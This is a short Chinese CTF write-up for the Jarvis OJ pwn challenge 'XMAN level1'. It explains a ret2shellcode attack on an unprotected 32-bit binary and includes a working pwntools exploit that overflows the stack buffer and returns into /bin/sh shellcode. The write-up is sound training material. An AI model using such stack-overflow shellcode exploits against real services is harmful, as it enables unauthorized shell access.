[Jarvis OJ - PWN]——[XMAN]level1
[Jarvis OJ - PWN]——[XMAN]level1
- 题目地址:https://www.jarvisoj.com/challenges
- 题目:
先checksec一下,什么保护都没有开。32位程序。
看看IDA,找到了可以利用的栈溢出的read函数.
开开心心的去找system函数.找了半天没找到,同时也没有/bin/sh字符串
并且这道题什么保护都没开,应该是ret2shellcode的pwn题.buff2的地址题目给输出了出来.所以
exp:
from pwn import *
p = remote("pwn2.jarvisoj.com", 9877)
shellcode = asm(shellcraft.sh()).ljust(0x88,"\x00") # 可以理解为system("/bin/sh")
ret_addr = p.recvline()[14: -2]
ret_addr = int(ret_addr, 16)
payload = shellcode + "a"*(0x4) + p32(ret_addr)
p.sendline(payload)
p.interactive()
[Jarvis OJ - PWN]——[XMAN]level1相关推荐
- [Jarvis OJ - PWN]——[XMAN]level4
[Jarvis OJ - PWN]--[XMAN]level4 题目地址: https://www.jarvisoj.com/challenges 题目: checksec一下 IDA中 思路 0x1 ...
- [Jarvis OJ - PWN]——[XMAN]level3_x64
[Jarvis OJ - PWN]--[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再 ...
- [Jarvis OJ - PWN]——[XMAN]level3
[Jarvis OJ - PWN]--[XMAN]level3 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,32位程序开启了NX保 ...
- [Jarvis OJ - PWN]——[XMAN]level2(x64)
[Jarvis OJ - PWN]--[XMAN]level2(x64) 题目地址:https://www.jarvisoj.com/challenges 题目: checksec一下,是64位程序. ...
- [Jarvis OJ - PWN]——[XMAN]level0
[Jarvis OJ - PWN]--[XMAN]level0 题目地址:https://www.jarvisoj.com/challenges 题目: checksec看看,64位,开启了NX保护 ...
- [Jarvis OJ - PWN]——[XMAN]level2
[Jarvis OJ - PWN]--[XMAN]level2 题目地址:https://www.jarvisoj.com/challenges 题目: 首先,checksec一下.32位并且没有开启 ...
- [Jarvis OJ - PWN]——Typo(内涵peak小知识)
[Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...
- [Jarvis OJ - PWN]——Backdoor
[Jarvis OJ - PWN]--Backdoor 题目地址: https://www.jarvisoj.com/challenges 题目: 额,怎么说呢这个题有点出乎我的意料, 有点晕乎乎的. ...
- [Jarvis OJ - PWN]——[61dctf]fm
[Jarvis OJ - PWN]--[61dctf]fm 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下, 开启了canary ...
最新文章
- unity镜像_通过镜像学习Unity Multiplayer Basics
- dbutility mysql_c# 数据库通用类DbUtility
- ASP.NET Core on K8s学习之旅(14)Ingress灰度发布
- [密码学基础][每个信息安全博士生应该知道的52件事][Bristol52]42蒙哥马利乘法,哪里泄漏侧信道路吗?
- Ionic3 环境搭建以及基础配置实现(更新中)
- linux隐藏tomcat版本_Ubuntu 14.04隐藏Tomcat-7.0.52的版本号与操作系统类型
- 【Java数据结构与算法】第十二章 哈夫曼树和哈夫曼编码
- matlab的annotation,科学网—annotation in matlab Graph - 夏靖的博文
- python数据录入_Re:从零开始的Python数据分析(实战篇)
- 【大数据部落】基于LDA主题模型聚类的商品评论文本挖掘
- 西门子博图编程:使用S7-1500冗余PLC 建立ModbusTCP通信
- 计算机硬盘容量减少修复,硬盘容量丢失的修复方法
- pandas库的使用
- SRA数据下载(通过EBI-ENA数据库,使用ASpera)
- 降薪潮、裁员潮,普通IT数据人的30岁没电视剧里那么容易
- Nginx服务器支持.htaccess的方法
- 第十三届蓝桥杯EDA赛项国奖心得分享
- 大数的溢出,正溢出和负溢出
- IBM小型机AIX操作系统总结01--基础知识
- 数据结构与算法(java):树的基本概述
热门文章
- Page_Load Page_Init方法使用原理(转)
- LeetCode Algorithm 274. H 指数
- 111. Minimum Depth of Binary Tree 二叉树的最小深度
- Java二分查找、折半查找
- 适用于android 4.0以上版本的子线程网络图片查看器
- 【STM32】RTC程序示例
- 【Linux】一步一步学Linux——seq命令(221)
- 【C++】 C++标准模板库(六) Queue
- Android开发文章推荐
- python日历函数_python 怎么定义一个函数,输出日历